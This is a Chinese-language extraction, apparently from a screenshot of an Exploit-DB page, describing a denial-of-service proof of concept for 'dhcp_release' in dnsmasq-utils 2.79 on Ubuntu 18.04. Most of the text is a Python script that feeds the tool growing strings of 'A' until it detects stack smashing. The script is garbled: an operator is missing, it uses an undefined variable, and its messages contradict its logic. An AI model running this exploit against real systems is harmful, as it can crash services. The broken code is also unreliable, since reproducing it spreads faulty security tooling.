从该网页截图中可以提取以下关于漏洞的关键信息: EDB-ID: 48301 CVE: N/A Author: JOSUEENCINAR Type: DOS Platform: Linux Date: 2020-04-07 Vulnerable App: dnsmasq-utils 2.79-1 Exploit Title: 'dhcp_release' Denial of Service (PoC) Exploit Date: 2020-04-06 Exploit Author: Josue Encinar Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 Version: 2.79 Tested on: Ubuntu 18.04 关于漏洞的详细描述如下: python from subprocess import Popen, PIPE data = "" bof = False for i in range(1,200): A = "A"i data = f"dhcp_release {A} 1 1" dhcprelease = Popen(data.split(), stdout=PIPE) if b' stack smashing detected : terminated' in result.stdout.readline(): print("[-] No buffer overflow...") bof = True print(f"[+] Buffer Overflow detected!") print(f"[] Offset: {i}") break if not bof: print("[-] No buffer overflow...")